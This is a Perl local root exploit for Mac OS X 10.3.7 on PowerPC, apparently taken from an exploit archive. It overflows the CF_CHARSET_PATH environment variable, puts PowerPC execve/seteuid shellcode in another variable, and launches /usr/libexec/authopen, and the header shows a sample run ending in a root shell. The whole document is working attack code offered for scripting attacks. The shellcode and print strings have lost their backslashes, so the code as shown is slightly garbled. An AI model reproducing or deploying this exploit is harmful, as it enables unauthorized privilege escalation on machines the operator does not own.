#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# Variant of CF_CHARSET_PATH a local root exploit by v9_at_fakehalo.us
#
# I was in the mood for some retro shit this morning, and I need root on some old ass G3 iMacs for a demo.
#
# I got sick of pressing enter on v9's exploit. It gets in the way when scripting attacks.
#
# Jill-Does-Computer:/tmp jilldoe$ ./authopen-CF_CHARSET.pl 0
# *** Target: 10.3.7 Build 7T65 on PowerPC, Padding: 1
# sh-2.05b# id
# uid=502(jilldoe) euid=0(root) gid=502(jilldoe) groups=502(jilldoe), 79(appserverusr), 80(admin), 81(appserveradm)
#
#

foreach $key (keys %ENV) {

   delete $ENV{$key};

}

#// ppc execve() code by b-r00t + nemo to add seteuid(0)
$sc =
"x7cx63x1ax79" .
"x40x82xffxfd" .
"x39x40x01xc3" .
"x38x0axfexf4" .
"x44xffxffx02" .
"x39x40x01x23" .
"x38x0axfexf4" .
"x44xffxffx02" .
"x60x60x60x60" .
"x7cxa5x2ax79" .
"x40x82xffxfd" .
"x7dx68x02xa6" .
"x3bxebx01x70" .
"x39x40x01x70x39x1fxfexcf" .
"x7cxa8x29xaex38x7fxfexc8" .
"x90x61xffxf8x90xa1xffxfc" .
"x38x81xffxf8x38x0axfexcb" .
"x44xffxffx02x7cxa3x2bx78" .
"x38x0axfex91x44xffxffx02" .
"x2fx62x69x6ex2fx73x68x58";

$tgts{"0"} = "10.3.7 Build 7T65 on PowerPC:1";
$tgts{"1"} = "10.3.7 debug 0x41424344:0";

unless (($target) = @ARGV) {

       print "nnUsage: $0 <target> nnTargets:nn";

       foreach $key (sort(keys %tgts)) {
               ($a,$b) = split(/:/,$tgts{"$key"});
               print "t$key . $an";
       }

       print "n";
       exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/:/,$tgts{"$target"});
print "*** Target: $a, Padding: $bn";

# add a wrapper here if you want more than euid=0
open(SUSH,">/tmp/sh");
printf SUSH "/bin/csh -in";

$ENV{"CF_CHARSET_PATH"} = "A" x 1048 . pack('l', 0xbffffef6) x 2;

$ENV{"APPL"} = "." x $b . "iiii" x 40 . $sc ;

system("/usr/libexec/authopen /etc/master.passwd");

# www.Syue.com [2006-08-02]